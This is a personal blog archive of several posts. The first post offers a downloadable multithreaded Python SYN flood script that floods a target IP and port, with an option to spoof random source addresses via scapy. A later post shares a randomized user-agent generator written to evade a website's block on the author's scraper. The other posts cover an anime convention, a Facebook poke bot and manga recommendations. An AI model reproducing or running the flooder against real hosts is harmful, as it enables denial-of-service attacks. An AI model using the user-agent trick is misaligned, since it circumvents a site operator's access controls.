Anyway, aside from searches for the phrase "How can you say you love her if you can't even eat her poop?" (oh yeah, I'm an SEO master), the majority of external search engine hits to my website come from people looking for this script. Therefore, I decided I'd spruce it up a touch, and repost it in all of its glory here.
So without further adieu, gaze and behold!
#!/usr/bin/env python ######################################### # # SYNflood.py - A multithreaded SYN Flooder # By Brandon Smith # brandon.smith@studiobebop.net # # This script is a demonstration of a SYN/ACK 3 Way Handshake Attack # as discussed by Halla of Information Leak # ######################################### import socket import random import sys import threading #import scapy # Uncomment this if you're planning to use Scapy ### # Global Config ### interface = None target = None port = None thread_limit = 200 total = 0 #!# End Global Config #!# class sendSYN(threading.Thread): global target, port def __init__(self): threading.Thread.__init__(self) def run(self): # There are two different ways you can go about pulling this off. # You can either: # - 1. Just open a socket to your target on any old port # - 2. Or you can be a cool kid and use scapy to make it look cool, and overcomplicated! # # (Uncomment whichever method you'd like to use) # Method 1 - # s = socket.socket() # s.connect((target,port)) # Methods 2 - # i = scapy.IP() # i.src = "%i.%i.%i.%i" % (random.randint(1,254),random.randint(1,254),random.randint(1,254),random.randint(1,254)) # i.dst = target # t = scapy.TCP() # t.sport = random.randint(1,65535) # t.dport = port # t.flags = 'S' # scapy.send(i/t, verbose=0) if __name__ == "__main__": # Make sure we have all the arguments we need if len(sys.argv) != 4: print "Usage: %s <Interface> <Target IP> <Port>" % sys.argv[0] exit() # Prepare our variables interface = sys.argv[1] target = sys.argv[2] port = int(sys.argv[3]) # scapy.conf.iface = interface # Uncomment this if you're going to use Scapy # Hop to it! print "Flooding %s:%i with SYN packets." % (target, port) while True: if threading.activeCount() < thread_limit: sendSYN().start() total += 1 sys.stdout.write("\rTotal packets sent:\t\t\t%i" % total)
Download: SYNFlood.py
January 3, 2013 at 12:00 PM
I went to Ikkicon last weekend with my younger brother and a few of my friends, and it was a lot more fun than it was last year. I spent a lot of money, I learned a great many things, and had a wonderful time.
Here are the highlights.
If you're going to buy one thing, you might as well buy six!
Some of you may be familiar with "The Slippery Slope", i.e. the practice of buying figures and other such merchandise from various anime, manga, and video games. Well I've been riding down that particular incline for a few years now, and as I get older and make more money, my collection only grows more and more powerful.
Anyway, I thought that I had bought a lot of figures this year at San-Japan, but my haul from Ikkicon this year (pictured on the right) blew that collection out of the water! Here's a quick break down of what I bought.
Now while this haul from Ikkicon is pretty darn awesome, though it would have been better if I could have found an Elsie figure, I'm faced with a serious problem. I don't have anywhere to put these new figures! My current shelf situation has just about reached critical mass, but I have a plan!
When I get back to my apartment on Friday, I'm going to bust out some serious feng shui on my room. What I want to do is get two or three of these DETOLF glass display cabinets from IKEA, and then rig up some cool LED lighting in them as outlined by this article. I've seen examples of other people's collections who have taken this approach, and it looks pretty awesome. I've got the skills and cash necessary to execute a project like this, now I just need to figure out how to fit it all in to my room, and still be able to sleep.
That boy aint right.
This one came way out of nowhere. The guy who played the voice of John Redcorn from King of the Hill was at Ikkicon. He was signing autographs, and selling John Redcornchips. I bought a bag, and got him to say a few lines from the show. It was a cool experience, but it's also such an odd thing to see at an anime convention, that you just gotta laugh.
The Game Room
One thing that has always been way hit or miss for me at cons, is the game room. This year Ikkicon's game room was pretty meh. They had a few consoles and you could pick a few games to play which was nice, but the TVs were way too small, and Melee was straight up banned. There was a little Rock Band station set up, but that's kinda hard to get into when you can barely hear the music. There was also a rigged up Stepmania (DDR for PC) game, and that was it.
I wish Ikkicon would do what they did a few years ago, and have 20 or so PCs setup on a LAN, and just have everyone play Unreal Tournament and Call of Duty. That was waaaaaay more fun. It wasn't that the game room was terrible or anything, it just wasn't very good.
If I were in charge of setting up the ideal game room for a con, here's what I'd have.
Dubs in my VN? It's more likely than you think.
We went to a panel on Saturday about dubbing visual novels. This was a subject that had us scratching our heads, as we had never heard of anything like this before. Well apparently it's a thing, albeit a pretty small one. The panel itself was more focused on how to not suck at being a professional voice over talent, and was very interesting.
I'm pretty sure the panel was being ran by the people from Sake Visual, and we were able to learn all about non-Japanese visual novels, and about the English VN dubbing scene. I ended up buying some stuff from them later that day after the panel (pictured left).
The game at the top in the picture is Koenchu, and it's the only one that I've played so far. I started out playing it with the English dub on, but I didn't like it. To be fair, it's a game about being in a school for becoming a voice actor in Japan, so it would be pretty hard to make a dub that would be able to really capture the essence of moe moe Japanese seiyuu.
The bottom two games are a series of detective games that was developed here in the US by Sake Visual. I'm excited to play these two. They were described to me as being kind of like Phoenix Wright mixed with Higurashi, which sounds like a pretty sweet combo. From what I've seen from the art shown off by the about page on the Sake Visual website, the art looks like it'll be pretty good. I just hope that the dub is decent too.
Nerdcore Comedy
Ikkicon had a nerdcore comedy show this year, and it was pretty good. We were late and missed the first act, but the second guy was pretty good, and he totally made fun of these super saiyan level loud dudes that were sitting right behind us. The final act was Alex "KOOLAID" Ansel, and he was great. My brother and I saw him at San-Japan earlier this year, and he was even better this time at Ikkicon. He performed for a long time, told some jokes I hadn't heard from him before, and was all around awesome. I even picked up a copy of his bootleg.
The End.
January 3, 2013 at 12:00 PM
== Source code available on my Github. ==
A friend of mine asked me to write him a bot that would automatically poke back anyone who poked him on Facebook, so that's what I did.
This bot doesn't make use of any of the actual Facebook APIs, but instead performs all of its actions by mimicking the behavior of an actual web browser. I designed it this way for three reasons.
Requirements
Usage
Assuming you meet all the requirements listed above, all you need to do is run main.py Pokebot will ask for your Facebook email and password, as well as an amount of time to wait between checking for pokes. Once all of that information is squared away, Pokebot will run on a continuous loop until you tell it to stop.
== Source code available on my Github. ==
October 24, 2012 at 12:00 PM
Granted I'm slowpoking super hard on this, but holy crap!
There is an article over on ZDNet about heuristic password cracking that is pretty much based entirely on my article "Building the Better Brute Force Algorithm", which was published in 2600: The Hacker Quarterly last July!
Not only that, but it uses direct quotes from my article, as well as paraphrasing, and even mentions my name!
That's so awesome!
October 24, 2012 at 12:00 PM
I put together a scraping bot for a website I frequent occasionally, but they got wise to my Python shenanigans after I released the source code (who'd have thought?), so I had to step up my bot code a bit.
After some tinkering I found that they had just blacklisted the user agent header I was using for the script, instead of doing something more effective like setting access timers between page requests, or getting strict on referer headers, or just banning my account.
But I digress...
Since all they did was ban the user agent string I was using before, all I had to do was change it , and I was back in business. But in the long run this isn't really the best solution since they could always just ban the user agent header again. So instead I decided to throw together a quick Python function that generates a randomized, realish looking user agent header.
Gaze and behold!
def get_random_useragent(): base_agent = "Mozilla/%.1f (Windows; U; Windows NT 5.1; en-US; rv:%.1f.%.1f) Gecko/%d0%d Firefox/%.1f.%.1f" return base_agent % ((random.random() + 5), (random.random() + random.randint(1, 8)), random.random(), random.randint(2000, 2100), random.randint(92215, 99999), (random.random() + random.randint(3, 9)), random.random()) >>> print get_random_useragent() Mozilla/5.2 (Windows; U; Windows NT 5.1; en-US; rv:2.5.0.5) Gecko/2009098692 Firefox/3.3.0.4 >>> print get_random_useragent() Mozilla/5.5 (Windows; U; Windows NT 5.1; en-US; rv:3.3.0.7) Gecko/2006095233 Firefox/3.2.0.2 >>> print get_random_useragent() Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.1.0.4) Gecko/2064093484 Firefox/4.4.0.8 >>> print get_random_useragent() Mozilla/5.6 (Windows; U; Windows NT 5.1; en-US; rv:7.5.0.6) Gecko/2063099117 Firefox/3.6.0.6
I hope someone out there besides me can find a use for this.
Download: random_useragent.py
J!
March 21, 2012 at 12:00 PM
Ever since I started developing the iManga Reader app back in 2009, I've had the chance to read a lot of different manga. So, listed below in no particular order are five manga that I recommend you check out.
March 6, 2012 at 12:00 PM
Just bought this today, suuuuper stoked to play it. I will say this though, I am not very happy that EA has chosen to hold my game hostage until I install their Steam rip-off, and register an account with them.
At least they aren't making me install Gamespy or Banzai Buddy :/
IP hostage negotiations aside, it's time to go save the universe, and make this happen. | http://teh-1337.studiobebop.net/ | CC-MAIN-2019-13 | refinedweb | 4,791 | 69.62 |
I kinda like Dart mirrors.
As a long time dynamic language programmer, I didn't think that I would, but it can be quite pleasant. Other times, however...
In the code from last night's video, the
call()method in the
SimpleCommandclass is nice:
import 'dart:mirrors'; class SimpleCommand<T> implements Command { T receiver; Symbol action; List args=[]; SimpleCommand(this.receiver, this.action, [this.args]); void call() { reflect(receiver).invoke(action, this.args); } }This reflects on the object, then invokes a method with arguments. What could be easier or cleaner?
What I do not like is what I did with the
Historyclass, which holds a list of undoable commands in an application. The guard clause at the beginning of the
add()method is too long and obtuse:
class History { // ... static void add(Function c) { if (!reflect(c).type.instanceMembers.containsKey(#undo)) return; _h._undoCommands.add(c); } // ... }What that line does is return when the command does not support an
undo()method. That is, commands that cannot undo should not be added to this history list. It works, but...
I cannot work directly with the object mirror—there is no way for the object mirror in Dart to reflect on its methods or properties. So instead, I have to get a class mirror from the object mirror's
typeproperty. Then, I get a map of the supported methods with
instanceMembers. Finally, I can ask if the list of instance members (methods) includes the
undo()by asking if the map contains the
#undosymbol. But I do not want to know if it contains the key—I want to know if it does not contain the key—so I have to go all the way back to the beginning of the expression to negate it.
I might simplify slightly by breaking parts out into helper methods or switching from a returning, negated guard clause to a curly-brace enclosing expression. Neither of those options really helps cut through the dense, hard-to-read code. I breezed through this implementation last night in the hopes that something better would appear today. Sadly, I cannot find anything in Dart mirrors that can make this any better.
I could switch my undoable command classes to support a different interface—
UndoableCommandinstead of
Command:
abstract class Command implements Function { void call(); } abstract class UndoableCommand implements Command { void call(); void undo(); }Then commands that support undo, like move-north, can implement this new interface:
class MoveNorthCommand implements UndoableCommand { Robot robot; MoveNorthCommand(this.robot); void call() { robot.move(Direction.NORTH); } void undo() { robot.move(Direction.SOUTH); } }Making use of that, my guard clause is much clearer:
class History { // ... static void add(Function c) { if (c is! UndoableCommand) return; _h._undoCommands.add(c); } // ... }That is much clearer than my mirror based approach. But I hate it.
It seems crazy to declare a class whose sole purpose is to describe that it supports a single method. Why not just ask it if it supports the method?
In the end, it is a good thing I punted this question until today. I finished the video and this certainly would have side-tracked me. I remain unsure what I would do if presented with this in live code. From a code maintainability perspective, I prefer the mirror approach (I'd likely put the obtuse path to the answer into a helper method). From a performance perspective, I would likely favor the subclass-just-to-support-one-method approach, avoiding mirrors. So it depends.
And last night's quick and dirty solution just might end up being my real solution in many instances.
Maybe you can come up with a better approach on DartPad!
Day #44
I poked around with the code a bit here
The main changes I made are
- Command is a typedef. Function is too broad IMO for this
- UndoableCommand has a getter `Command get undoCommand;` which is an inverse of the first. This means that command.undoCommand.undoCommand gets you back to your original command. I used that to implement south and west commands
- I replaced the classes for the direction commands with functions. Mainly cause I didn't think it added much value being a class and cause then I could do `UndoableCommand moveSouthCommand(Robot robot) => moveNorthCommand(robot).undoCommand;`
- removed the reflection cause I didn't see why you need it. I'm pretty sure everything can just be done with closures.
Anyway, just some quick thoughts. Make of them what you will | https://japhr.blogspot.com/2015/12/subclass-just-to-support-one-method.html | CC-MAIN-2018-22 | refinedweb | 743 | 66.33 |
By including this component, you can show overflown items in popover. Lets see how to use this library. This library built on top of react-bootstrap so you should install react-bootstrap to use this
Using npm
npm install react-fit-items-popover --save
Import Component
import FitItemsPopover from 'react-fit-items-popover';
Usage
Here you can pass maximum width, popoverPlacement, popoverClassName, title, items
<FitItemsPopover title="Countries" maxWidth="250px" popoverPlacement="top" popoverClassName="myCustomPopoverClass" items={['Iceland','India','Indonesia','Iran','Iraq','Ireland']}> </FitItemsPopover>
Full example
Here you can find the full example
import React from 'react'; import FitItemsPopover from 'react-fit-items-popover'; import '../../node_modules/bootstrap/dist/css/bootstrap.css' import '../../node_modules/react-fit-items-popover/lib/react-fit-items-popover.css' export default class App extends React.Component { constructor(props) { super(props); } render() { return ( <div> <h1>It Works </h1> <h3>FitItemsPopover example with popover placement</h3> <FitItemsPopover title="Countries" popoverPlacement="right" maxWidth="200px" items={['Iceland','India','Indonesia','Iran','Iraq','Ireland','Israel','Italy']}></FitItemsPopover> </div> ) } }
Relevant information and the programing language gives technical idea.Currently we can get so many online services like best essay writing service. This kind of reputed internet service really give such an amazing offer with relevant price.Students and researcher also madly depends upon such a writing help.
Really Great post! I am actually getting ready to across this information, is very helpful for me my friend. HP Customer Service We are hp service provider and we have a team of the highly trained employee working 24×7 to resolve your problem.
We are needed this article for improving your work place at innovation. So we are all must drive with employees to try new ideas from reviews. Then every user happy to get your great articles and.
light novel
Pada permainan judi seseorang pemain mesti menyiapkan taktik bermain untuk meraih kemenangan tiap-tiap bermain, akan tetapi beberapa pemain judi online belumlah tahu dengan tentu mengenai seperti apa tehnik meraih kemenangan bertambah cepat.
asikqq
dewaqq
sumoqq
interqq
pionpoker
bandar ceme terpercaya
hobiqq
paito warna
forum prediksi
thanks to your website
FaceTime for Android
Helpful InformationCRM Software in Mumbai
There's nothing useful. You should try reading this 10 reason to learn graphic design.
Here, you'll have the option to just recoup a wide range of misfortune from city Day, city Night, Rajdhani Day, Rajdhani Night, KalyanMatka, Matka Indian by Dpboss.team. We've a twisted to confront measure here to shape your existence with loaded up with fun and satisfaction. you'll have the option to have all very Satta Market's live outcomes on things Satta fix jodi..
Thank You For Sharing this kind of stuff. its soo helpful for me.
Easy In Canada.
Your posts are always informative. This post was a very interesting topic for me too. 토토사이트 I wish I could visit the site I run and exchange opinions with each other. So have a nice day.
Nice informative post. Thanks so much for sharing this awesome details .Electrical system design
great article
Home Tutor in rawalpindi
thanks to your website
fraquality constructions
great aticle
Addiction treatment center
Very informative, these kind of write-ups are necessary to acquire health related knowledge and consciousness. Health should be uncompromised on whatever it takes. Best Doctors in Karachi
You are doing really nice work, keep doing and sharing
Hi its very Informative Blog
Thanks for Sharing... I found something on my blog visit for more detail:
crack software
CCleaner Crack
Reimage PC Repair Crack
crack office 2016
Windows 8.1 product key
IDM crack
Movavi video converter crack
Driver Easy Crack.
I wanted this on our website and will now be trying to figure this out and add if possible. Thanks for sharing this information with us.
buy logo online
This write-up says it all. In addition, An individual will not be able to act in accordance with the expected behavior unless experienced. Education should be acquired to tackle all sort of life hacks not just eyeing on certain aspects.
Counseling for University
I am very happy after visiting your website with very useful information. I am from one of the digital marketing agency... To visit my agency click on link Visitdigitalguru
Very nice blog for Personal Emergency Response Systems.
Kindly visit our website by clicking the link below and feel free to give us a message for more information, we are highly recommended and totally safe to work with our English and American tech wizards from world-wide visit us
at https:probitcoinprivatekeyrecovery.com
Or telegram @derrekboyle or probtcpkrecoveryexperts@gmail.com or wickr us at btcrecoverypro
Thanks for sharing informative content…Find noida software company to know more and Contact us on given no.…
colocation and connectivity services at our data centre facilities in Sydney and Tasmania, Contact for Colocation Services Australia
Thanks for sharing information with us…satisfied after visiting your blog…. Learn the latest trends & their practical application by experts with us…you can contact us click on
Visit ISMT India
Really great info you provided here.
Thank You
online assignment help services
Assignment Writing Help
Essay Writing Help
Dissertation Writing Help Services
Case Study Writing Help
This comment has been removed by the author.
Oh. I was very surprised to hear this! Thank for your writting!
snowball io
Even if I can put all my searches on one side and this article on the other, still these words have more worth. Best SEO Services in Pakistan |
Good day! This post could not be written any better! Reading this post reminds me of my previous room mate! He always kept chatting about this. I will forward this page to him. Pretty sure he will have a good read. Thanks for sharing. kèo nhà cái
very nice brather
By purchasing a Windows product key, you will receive a 100% Original Microsoft product key license .
That can be activated directly on the official Microsoft website. Our secure payment methods give you a total guarantee,
and you will receive your software by email after a few minutes of purchase.
I am impressed. You must have been outstanding in perceiving things your way, this article signifies your grip on everyday life. It's like having top shoe brands in Pakistan.online shoes sale in pakistan
I like your post, thanks for sharing it with us,
law dissertation Writers
This is very interesting, You are a very skilled blogger. I've joined your rss feed and look forward to seeking more of your wonderful bong88. Also, I have shared your website in my social networks!
Spot on with this write-up, I truly believe that this amazing site needs much more attention. I’ll probably be returning to read through more, thanks for the information!
Your words really helped here. It was hard for me to go outdoors even for pasta near me. I really wish to have crossed by it earlier.
best pasta near me
I am glad to stop by here, your words here are so understandable that I didn't require to use any language translation services. e-invoicing in saudi arabia
Thanks for such an informative blog, it was really very helpful.
They are able to offer high class web-hosting services and a wide range of search engine optimisations services for the client websites. tradeford com
We recently covered the importance of professional website design as well as how a website design company can help you benefit from a customized website. A professional website design company can assist you in leveraging the power of the Internet in a number of ways. Website Design Company Dubai
Well I truly enjoyed studying it. This article offered by you is very useful for proper planning.
토토
경마
Thanks for your information........
Kitchen wall tiles is a perfect idea to break the visual monotony of the kitchen. In fact, the wall tiles add an upscale feel while cooking. We have an extensive collection of the kitchen wall tiles at MyTyles. One can choose from the wide range of stylish, superior quality and beautifully created tiles. An individual can create any style they want in their kitchen with our different pattern tiles. In fact, you have the choice to pick up from the colorful design tiles to simple stylish plain colors. There is a wide range of the tiles at MyTyles to create the desirable kitchen look. | http://blog.sodhanalibrary.com/2017/03/react-fit-items-popover-show-overflown.html | CC-MAIN-2022-27 | refinedweb | 1,392 | 56.25 |
In my last post, I talked about How To Customize Existing Visual Studio 2005 Templates for Coding Productivity. I essentially modified the existing C# Class.cs template that ships with Visual Studio 2005 to make it more useful in my development environment. This provides me a bit of code generation functionality out-of-the-box, allowing me to spend less time typing mundane code and more time solving problems.
Rather than tinkering with the existing templates that ship with VS 2005, however, Visual Studio 2005 allows you to create custom templates based on existing classes and projects in the IDE. You can create these templates using the Export Template Wizard located on the File Menu.
The VerboseCSharpClass Custom Template
I tend to add a number of regions, XML comments, and various overrides in all my C# Classes. Unfortunately, the default C# Class Template that ships with Visual Studio 2005 is pretty bare, requiring me to create the same class features over and over. And even though I tend to add these same features a lot, I am still not consistent in how I name the regions, write the XML comments, etc.All this typing distracts me from the real work and consumes precious minutes throughout the day.
My custom VerboseCSharpClass Template is to solve my problems. Now when I need a heavy duty class that requires such features, I just choose it from "Add New Item" as opposed to the generic C# Class Template that ships with VS 2005.
Creating The Template
Creating the template is nothing more than creating a C# Class with all the statements, fields, properties, methods, etc. that you want included by default when you create the class. Instead of hardcoding a class name and root namespace, however, you will instead put a couple of parameters used by Visual Studio 2005 to generate them for you within the context of the Add Item Process. Here is my quickly created class for testing purposes:
Exporting the Template
Exporting the template and adding it to Visual Studio 2005 is about as easy as you can get. Once you are happy with the template, save it and choose File > Export Template... on the menu. The export wizard will walk you through a 4-step process that saves the template as a *.Zip file and automatically imports it into Visual Studio 2005 for you. Here is a collage of images showing the process:
Conclusion
Whether you want to modify the existing default templates that ship with Visual Studio 2005, or even better, create new ones by using the Export Template Wizard, it would be a crime not to take advantage of these code generation features to help you be more productive in your day-to-day development efforts. These two features are in addition to the more obvious new way to improve your productivity - Code Snippets.
Recent Posts
Drinking: Japanese Sencha Green Tea
[Advertisement]
PingBack from
Pingback from visual studio 2005 missing web application template | http://codebetter.com/blogs/david.hayden/archive/2005/11/06/134343.aspx | crawl-002 | refinedweb | 495 | 58.42 |
Technical Support
On-Line Manuals
C251 User's Guide
#include <stdlib.h>
void xfree (
void xhuge *p); /* block to free */
The xfree function returns a memory block to the memory
pool. The p argument points to a memory block that
was previously allocated with the xcalloc, xmalloc, or
xrealloc functions. Once it has been returned to the memory
pool by the free function, the block is available for
subsequent allocation.
If p is a null pointer, it is ignored.
Note
None.
xcalloc, xinit_mempool, xmalloc, xrealloc
#include <stdlib.h>
#include <stdio.h> /* for printf */
void tst_free (void) {
void xhuge *mbuf;
printf ("Allocating memory\n");
mbuf = xmalloc (1000);
if (mbuf == NULL) {
printf ("Unable to allocate memory\n");
}
else {
xfree (mbuf);
printf ("Memory free. | http://www.keil.com/support/man/docs/c251/c251_xfree.htm | CC-MAIN-2020-05 | refinedweb | 121 | 65.42 |
Java Patterns For Concurrency
This post talks about some of the patterns we can use to solve concurrency issues relating to state shared across multiple threads. The goal is to provide some smarter alternatives to slapping synchronized on every method call, or around every block of code. The problem with synchronized is that is requires everyone to participate. If you have an object that is mutable and it is shared by synchronizing on it, then nearly every use of that object will require a synchronized block and it only takes one person to forget to create bedlam. In general, the goal is to write code such that we don’t need to consider concurrency, and we can write code without concerning ourselves with how everyone else it handling concurrency.
Limit State Changes To A Single Thread
This is a pattern that has been used in Swing and also JMonkey Engine (JME) where changes to common state should only be made in a main thread. This pattern is useful when you have tasks that go off and run, and once complete they need to catch up and update the display or game objects in the case of JME. I put this one first as it is a very top level pattern. If you decide to go this route, then you don’t have to worry to much about concurrency as long as you always follow the rule of updating state on the main thread.
In any component that runs asynchronously, once completed, it can schedule a piece of code to run on the main thread. Swing and JME offer their own ways of doing this, but you could create your own that allows something like the following:
public void execute() { int value = someLongProcessRunAsynchronously(); MainThread.enqueue(() -> form.updateLabel(value+" records Found")); }
The
Runnable code will be pulled from the queue by the main thread and executed. Obviously, any code run off the queue must be brief and not trigger any long running synchronous actions.
Duplicate State to Make it Local
We can duplicate mutable state into a local variable and reference it locally to take advantage of the fact that locally scoped data is inherently thread safe.
//don't move or update if -ve if (sharedInt >= 0) { moveBy(sharedInt); update(); }
The problem with this code is that if another thread interrupts it mid-execution and sets the
sharedInt value to a negative number, it will have undesired results.
If we copy the value and then work only with our local copy we are guaranteed to have the same value each time it is referenced in our function.
//don't move or update if -ve int localInt = sharedInt; if (localInt >= 0) { moveBy(localInt); update(); }
Here, we have localised the state so it cannot be touched by other threads, but the downside of this is that it can be tricky and/or expensive to copy more complex objects since we must copy the object atomically. For this reason we might need the help of some other patterns to ensure that can happen.
Encapsulate State
Let us say we have a map of key/value pairs, from a functional point of view, we probably might just expose the map to the world and let our threads have at it.
public class MyState { private Map<String,String> parameters; public Map<String,String> getParameters() { return parameters; } } //client code myState.getParameters().put("key","value"); if (myState.getParameters().contains("this")) { //assume 'that' is also present callFunction(myState.getParameters().get("that"); }
This opens a host of problems since any thread can get the map, keep references to it, and update it any time. This is the least thread safe thing we can do as our state has escaped our class.
First off, lets realise that just because we use a map to store some data, we don’t actually need to provide all access to the map to clients. In the interest of making it thread safe, we can encapsulate the map and just provide methods to access that map. Our state has no longer leaked out of the class and is somewhat protected. Once encapsulated, we can control how we access the map and do so in a manner that is more thread-safe.
For a first draft, we can simply make access methods synchronized :
public class MyState { private Map<String,String> parameters; public synchronized void addParameter(String key, String value) { parameters.put(key,value); } public synchronized String getParameter(String key) { return parameters.get(key); } }
We’ve made our code a little safer and arguably, a little better according to the Law of Demeter.
One problem is we have put synchronized on the methods and if we have other synchronized methods in the same class, even for different reasons, they will end up blocking each other unnecessarily. One solution is just to synchronize on the parameters object when we use it which should improve things a little, but there are some alternatives we can use to make things even better:
Read/Write Locks
If we read from an object far more than we write, we could improve the above example further. We can use Read/Write locks to ensure that we only block read access to the object when we are writing, but otherwise we can concurrently read from the object without being blocked by other readers. Infrequently writing means that readers should not be blocked that often.
public class MyState { private Map<String,String> parameters; private ReentrantReadWriteLock lock = new ReentrantReadWriteLock(); public void addParameter(String key, String value) { lock.writeLock().lock(); try { parameters.put(key,value); } finally { lock.writeLock().unlock(); } } public String getParameter(String key) { lock.readLock().lock(); try { return parameters.get(key); } finally { lock.readLock().unlock(); } } }
This does take more code including the try/finally blocks but it allows nearly unlimited concurrent reading with only writes blocking. We also have some options for dealing with cloning state atomically which was an issue raised above. (As an aside, why do we not have a method for passing the lockable code as a lambda such as
lock.readLock().execute(()->parameters.get(key));?).
We also have some nice options with locks that don’t make much sense here, but we can have timeouts for locks etc and as far as the interface goes, we can implement whatever helper functions we want and use the locks to handle them easily, such as the getter and add functions.
As an example, we can easily make a copy of the map without worrying about a write action disrupting things mid-execution:
public Map<String,String> getParameters() { lock.readLock().lock(); try { return new HashMap<>(parameters); } finally { lock.readLock().unlock(); } }
This means we can handle making a local copy of the state atomically and use it in conjunction with the local duplicate state pattern. This provides an implementation that is thread safe without the client even having to consider thread safety, nor can it be used in a thread unsafe manner.
Summary
These are some of the patterns you can use to defuse any concurrency issues with mutable state without having to resort to putting synchonized on everything and hoping for the best. | https://www.andygibson.net/blog/programming/java-patterns-for-concurrency/ | CC-MAIN-2021-31 | refinedweb | 1,187 | 57.3 |
The core implementation of dat
npm install dat-core
var dat =var db =db
db = dat(pathOrLevelDb, [options])
Create a new dat instance.
valueEncoding- 'json' | 'binary' | 'utf-8' or a custom encoder instance
createIfMissing- true or false, default false. creates dat folder if it doesnt exist
backend- a leveldown compatible constructor to use (default is require('leveldown'))
blobs- an abstract-blob-store compatible instance to use (default is content-addressable-blob-store)
Per default the path passed to the backend is
{path}/.dat/db.
If your custom backend requires a special url simply wrap in a function
var sqldown =var db =
db.head
String property containing the current head revision of the dat. Everytime you mutate the dat this head changes.
db.init([cb])
Inits the dat by adding a root node to the graph if one hasn't been added already. Is called implicitly when you do a mutating operation.
cb (if specified) will be called with one argument,
(error)
db.put(key, value, [opts], [cb])
Insert a value into the dat
cb (if specified) will be called with one argument,
(error)
dataset- the dataset to use
valueEncoding- an encoder instance to use to encode the value
db.get(key, [options], cb)
Get a value node from the dat
cb will be called with two arguments,
(error, value). If successful,
value will have these keys:
{content: // 'file' or 'row'type: // 'put' or 'del'version: // version hashchange: // internal change numberkey: // row keyvalue: // row value}
dataset- the dataset to use
valueEncoding- an encoder instance to use to decode the value
db.del(key, [cb])
Delete a node from the dat by key
cb (if specified) will be called with one argument,
(error)
db.listDatasets(cb)
Returns a list of the datasets currently in use in this checkout
cb will be called with two arguments,
(error, datasets) where
datasets is an array of strings (dataset names)
set = dat.dataset(name)
Returns a namespaced dataset (similar to a sublevel in leveldb).
If you just use
dat.put and
dat.get it will use the default dataset (equaivalent of doing
dat.dataset().
stream = db.createReadStream([options])
Stream out values of the dat. Returns a readable stream.
stream = db.createWriteStream([options])
Stream in values to the dat. Returns a writable stream.
dataset- the dataset to store the data in
message- a human readable message string to store with the metadata for the changes made by the write stream
transaction- boolean, default false. if true everything written to the write stream will be stored as 1 transaction in the history
batchSize- default
128, the group size used to write to the underlying leveldown batch write. this also determines how many nodes end up in the graph (higher batch size = less nodes)
valueEncoding- override the value encoding set on the dat-core instance
When you write data to the write stream, it must look like this:
{type: // 'put' or 'del'key: // keyvalue: // value}
stream = db.createFileReadStream(key, [options])
Read a file stored under the key specified. Returns a binary read stream.
stream = db.createFileWriteStream(key, [options])
Write a file to be stored under the key specified. Returns a binary write stream.
stream = db.createPushStream([options])
Create a replication stream that both pushes changes to another dat
stream = db.createPullStream([options])
Create a replication stream that both pulls changes from another dat
stream = db.createReplicationStream([options])
Create a replication stream that both pulls and pushes
stream = db.createChangesStream([options])
Get a stream of changes happening to the dat. These changes are ONLY guaranteed to be ordered locally.
stream = db.heads()
Get a stream of heads in the underlying dat graph.
stream = db.layers()
Get a stream of layers in the dat.
A layer will added if both you and a remote make changes to the dat and you then pull the remote's changes.
They can also happen if you checkout a prevision revision and make changes.
stream = db.diff(branch1, branch2)
Compare two or more branches with each other. The stream will emit key,value pairs that conflict across the branches
stream = db.merge(branch1, branch2)
Returns a merge stream. You should write key,value pairs to this stream that conflicts across the branches (see the compare method above).
Once you end this stream the branches will be merged assuming the don't contain conflicting keys anymore.
anotherDat = db.checkout(ref)
Checkout an older revision of the dat. This is useful if you want to pin your data to a point in time.
db
If you want to make this checkout persistent, i.e. your default head, set the
{persistent: true} option
var anotherDat = dbanotherDat
To reset your persistent head to the previous use
db.checkout(false, {persistent: true})
Wherever you can specify
valueEncoding, in addition to the built in string types you can also pass in an object with
encode and
decode methods.
For example, here is the implementation of the built-in JSON encoder:
var json ={return JSON}{return JSON}
MIT | https://www.npmjs.com/package/dat-core | CC-MAIN-2017-47 | refinedweb | 826 | 64.2 |
This is your resource to discuss support topics with your peers, and learn from each other.
02-03-2011 06:14 PM
HI all,
I was hoping you guys could help me with this, I've done a search and nobody seems to be experiencing the same problem. So first the setup: I have a TileList set up with one row in it. This TileList is using a custom class that extends CellRenderer to display its data. The problem is that if I scroll so the first element isn't visible anymore, its value is replaced by another element in my dataProvider.
Here's my code for the CellRenderer (where I'm assuming the problem lies):
public class MyRenderer extends CellRenderer { private var renderer:MyDataDisplay = new MyDataDisplay(); public function MyRenderer() { super(); } override protected function onAdded():void{ super.onAdded(); addChild(renderer); } override protected function onRemoved():void{ super.onRemoved(); removeChild(renderer); } override protected function drawLabel():void{ super.drawLabel(); if(data){ renderer.title.text= data.name as String; renderer.date.text = data.date as String; } }
Solved! Go to Solution.
02-03-2011 06:39 PM
hey cyangreen,
cell renderers and lists are the achilie heels of the QNX API's when it comes to figuring them out haha. and once you think u got it down, something unexpected happens and you have to change it up again lol.
i've run into problems here and there and usually when setting the data and what not, i override the public data() setter. that way i get accurate results. the cell renderer and list do some funky things sometiems and get weird read outs. so try doing that and see if that changes anything. so instead of overriding the drawLabel() method, override the data() setter:
override public function set data(data:Object):void { super.data = data; if (data.name && data.data) { renderer.title.text= data.name as String; renderer.date.text = data.date as String; } }
lemme know how that turns out. if it doesnt work, we'll try something else. good luck!
02-03-2011 07:00 PM
Thanks so much JRab, that did it.
For anyone experiencing similar issues, you have to remember to override onAdded and onRemoved:
override protected function onAdded():void{ super.onAdded(); addChild(el); //for all visual elements you want to add to this renderer } override protected function onRemoved():void{ super.onRemoved(); removeChild(element); //do this for all visual elements you've added }
If you don't do this, your data will start overlapping itself and start acting really wonky.
Thanks again JRab
02-03-2011 07:05 PM
not a problem at all. just glad you got it figured out and thanks for the tip!
p.s i like your choice of wording: "wonky" | https://supportforums.blackberry.com/t5/Adobe-AIR-Development/TileList-not-preserving-order-of-data-with-custom-CellRenderer/m-p/773563 | CC-MAIN-2017-04 | refinedweb | 454 | 57.98 |
Get a free year on Tuts+ this month when you purchase a Siteground hosting plan from $3.95/mo
Ruby is a one of the most popular languages used on the web. We've started a new screencast series here on Nettuts+ that will introduce you to Ruby, as well as the great frameworks and tools that go along with Ruby development. In this lesson, we’ll be taking a deeper look at operators in Ruby, and why they are different from anything you’ve ever seen before.
Operators
You’ve familiar with operators.
1 + 2 # 3 person[:name] = "Joe"
